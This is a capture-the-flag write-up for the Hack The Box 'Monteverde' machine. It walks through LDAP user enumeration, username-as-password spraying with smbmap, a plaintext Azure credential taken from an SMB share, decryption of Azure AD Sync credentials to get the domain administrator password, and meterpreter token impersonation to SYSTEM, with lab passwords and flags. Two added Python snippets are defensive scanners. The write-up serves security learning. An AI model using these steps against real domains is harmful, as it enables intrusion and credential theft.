HTB{monteverde}
recon
nmap
# Nmap 7.80 scan initiated Thu Mar 19 18:04:54 2020 as: nmap -sC -sV -p- -v -o monteverde_tcp.nmap 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.19s latency).
Not shown: 65516 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-19 21:24:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
49774/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/19%Time=5E73E09F%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 10m51s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-03-19T21:27:24
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 19 18:19:09 2020 -- 1 IP address (1 host up) scanned in 855.05 seconds
Basic LDAP search
ldapsearch -h 10.10.10.172 -x -b "DC=MEGABANK,DC=LOCAL"
cat ldap.log | grep user
description: Default container for upgraded user accounts
objectClass: user
userAccountControl: 66082
description: Servers in this group enable users of RemoteApp programs and pers
e users RemoteApp programs and personal virtual desktops run. This group need
is applies only to WMI namespaces that grant access to the user.
objectClass: user
userAccountControl: 532480
description: All domain users
description: Servers in this group can access remote access properties of user
description: Members of this group can update user accounts in Active Director
objectClass: user
userAccountControl: 66048
objectClass: user
userAccountControl: 66048
homeDirectory: \\monteverde\users$\mhope
userPrincipalName: mhope@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
userPrincipalName: SABatchJobs@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
userPrincipalName: svc-ata@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
userPrincipalName: svc-bexec@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
userPrincipalName: svc-netapp@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
homeDirectory: \\monteverde\users$\dgalanos
userPrincipalName: dgalanos@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
homeDirectory: \\monteverde\users$\roleary
userPrincipalName: roleary@MEGABANK.LOCAL
objectClass: user
userAccountControl: 66048
homeDirectory: \\monteverde\users$\smorgan
userPrincipalName: smorgan@MEGABANK.LOCAL
cat ldap.log | grep user| grep home | awk -F 'users' '{print $2}' | tr -d '$\\' > users.txt
dgalanos
mhope
roleary
SABatchJobs
SatchJobs
smorgan
svc-ata
svc-bexec
svc-netapp
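As an added example (not part of the original writeup), a small Python parser for ldapsearch output like the dump above: it groups the LDIF into entries, decodes the userAccountControl values that appear in it (66048, 66082, 532480) and reports enabled accounts whose password never expires or is not required, which is the hygiene finding a defender would take from this enumeration. The SAMPLE dump is constructed to mirror the output.

```python
import re
from collections import defaultdict

# userAccountControl bits (subset of the documented MS-SAMR flag values)
UAC_FLAGS = {0x2: "ACCOUNTDISABLE", 0x20: "PASSWD_NOTREQD", 0x200: "NORMAL_ACCOUNT",
             0x2000: "SERVER_TRUST_ACCOUNT", 0x10000: "DONT_EXPIRE_PASSWORD",
             0x80000: "TRUSTED_FOR_DELEGATION"}

def parse_ldif(text):
    """Split ldapsearch (LDIF) output into entries, one dict of attr -> [values] each.
    Blank lines separate entries; a line starting with a space continues the previous one."""
    unfolded = re.sub(r"\n ", "", text)          # join folded continuation lines
    entries = []
    for block in re.split(r"\n\s*\n", unfolded):
        entry = defaultdict(list)
        for line in block.splitlines():
            if line and not line.startswith("#"):
                attr, _, value = line.partition(":")
                entry[attr.strip()].append(value.strip())
        if entry:
            entries.append(dict(entry))
    return entries

def decode_uac(value):
    """Return the set of flag names set in a userAccountControl integer."""
    v = int(value)
    return {name for bit, name in UAC_FLAGS.items() if v & bit}

def weak_password_policy_accounts(text):
    """{userPrincipalName: [flags]} for enabled user objects whose password never
    expires or is not required; these are the accounts to review first."""
    findings = {}
    for e in parse_ldif(text):
        if "user" not in e.get("objectClass", []) or "userPrincipalName" not in e:
            continue
        flags = decode_uac(e["userAccountControl"][0])
        weak = flags & {"DONT_EXPIRE_PASSWORD", "PASSWD_NOTREQD"}
        if weak and "ACCOUNTDISABLE" not in flags:
            findings[e["userPrincipalName"][0]] = sorted(weak)
    return findings

# Constructed sample modelled on the ldapsearch output above (not a real dump).
SAMPLE = r"""dn: CN=Mike Hope,OU=Users,DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: user
description: Example account with a long description that ldapsearch wraps ont
 o a continuation line
userAccountControl: 66048
homeDirectory: \\monteverde\users$\mhope
userPrincipalName: mhope@MEGABANK.LOCAL

dn: CN=Guest,CN=Users,DC=MEGABANK,DC=LOCAL
objectClass: user
userAccountControl: 66082
userPrincipalName: guest@MEGABANK.LOCAL
"""

if __name__ == "__main__":
    for upn, flags in weak_password_policy_accounts(SAMPLE).items():
        print(f"{upn}: {', '.join(flags)}")
```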
user.txt
Using these same usernames as passwords, we get a valid one:
root@Kali:~/Documentos/hackthebox/machines/monteverde for k in `cat users.txt`; do smbmap -u $k -d MEGABANK.LOCAL -p $k -H 10.10.10.172; done
SABatchJobs:SABatchJobs
root@Kali:~/Documentos/hackthebox/machines/monteverde smbclient -W MEGABANK.LOCAL '\\10.10.10.172\users$' -U 'SABatchJobs'%'SABatchJobs'
Try "help" to get a list of possible commands.
smb: \> cd mhope
smb: \mhope\> ls
. D 0 Fri Jan 3 10:41:18 2020
.. D 0 Fri Jan 3 10:41:18 2020
azure.xml AR 1212 Fri Jan 3 10:40:23 2020
524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (1,3 KiloBytes/sec) (average 1,3 KiloBytes/sec)
creds
root@Kali:~/Documentos/hackthebox/machines/monteverde/user.txt# cat azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>
root@Kali:~/Documentos/hackthebox/machines/monteverde/user.txt#
We use the same script to check whose creds these are: they belong to mhope.
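The azure.xml above is PowerShell CLIXML (Export-Clixml output): only SecureString values are serialised protected as <SS>, while a plain <S> string property is stored in clear text, which is how a credential ends up readable on a share. As an added example (not from the original writeup), a Python scanner that walks such files and reports secret-looking string properties by type, name and length without echoing the value; the SAMPLE document is constructed.

```python
import pathlib
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
SECRET_NAMES = {"password", "secret", "clientsecret", "key", "token"}

def find_plaintext_secrets(clixml_text):
    """Return (object type, property name, value length) for every plain <S>
    property in a CLIXML document whose name looks like a secret. <SS>
    (SecureString) properties are DPAPI-protected and are not reported."""
    root = ET.fromstring(clixml_text)
    findings = []
    for obj in root.iter(f"{{{PS_NS}}}Obj"):
        tn = obj.find(f"{{{PS_NS}}}TN/{{{PS_NS}}}T")
        type_name = tn.text if tn is not None else "?"
        props = obj.find(f"{{{PS_NS}}}Props")
        if props is None:
            continue
        for child in props:
            name = child.get("N", "")
            if child.tag == f"{{{PS_NS}}}S" and name.lower() in SECRET_NAMES and child.text:
                findings.append((type_name, name, len(child.text)))
    return findings

def scan_tree(root_dir):
    """Scan every .xml under root_dir (e.g. a mounted users share); path -> findings."""
    results = {}
    for path in pathlib.Path(root_dir).rglob("*.xml"):
        try:
            hits = find_plaintext_secrets(path.read_text(encoding="utf-8-sig"))
        except ET.ParseError:
            continue           # not CLIXML, skip
        if hits:
            results[str(path)] = hits
    return results

# Constructed sample: one object with a clear-text <S> password (flagged) and
# one PSCredential whose password is a protected <SS> (not flagged).
SAMPLE = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0"><T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T><T>System.Object</T></TN>
    <Props>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">EXAMPLE-plaintext-secret</S>
    </Props>
  </Obj>
  <Obj RefId="1">
    <TN RefId="1"><T>System.Management.Automation.PSCredential</T><T>System.Object</T></TN>
    <Props><S N="UserName">svc-example</S><SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb</SS></Props>
  </Obj>
</Objs>"""
```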
WinRM with mhope:4n0therD4y@n0th3r$
user.txt:4961976bd7d8f4eeb2ce3705e2f212f2
root.txt
PS C:\Users\mhope\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins Group S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
With this, we have the privileges needed to dump the administrator's creds by abusing the encrypted XML in the SQL statements of Azure AD Sync (link).
PS C:\program files\microsoft azure ad sync\bin> C:\Windows\System32\spool\drivers\color\adecrypt.exe -FullSQL
C:\Windows\System32\spool\drivers\color\adecrypt.exe -FullSQL
======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================
Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!
DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL
PS C:\program files\microsoft azure ad sync\bin>
got it
root@Kali:~/Documentos/hackthebox/machines/monteverde/root.txt# ruby winrm_admin.rb
PS C:\Users\Administrator\Documents> whoami
megabank\administrator
PS C:\Users\Administrator\Documents> type C:\users\administrator\desktop\root.txt
12909612d25c8dcf6e5a07d1a804a0bc
PS C:\Users\Administrator\Documents>
For SYSTEM
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
MEGABANK\AAD_987d7f2f57d2
MEGABANK\Administrator
MEGABANK\mhope
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\SYSTEM
NT SERVICE\SQLTELEMETRY
Window Manager\DWM-1
Impersonation Tokens Available
========================================
NT AUTHORITY\NETWORK SERVICE
NT SERVICE\MSSQLSERVER
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter >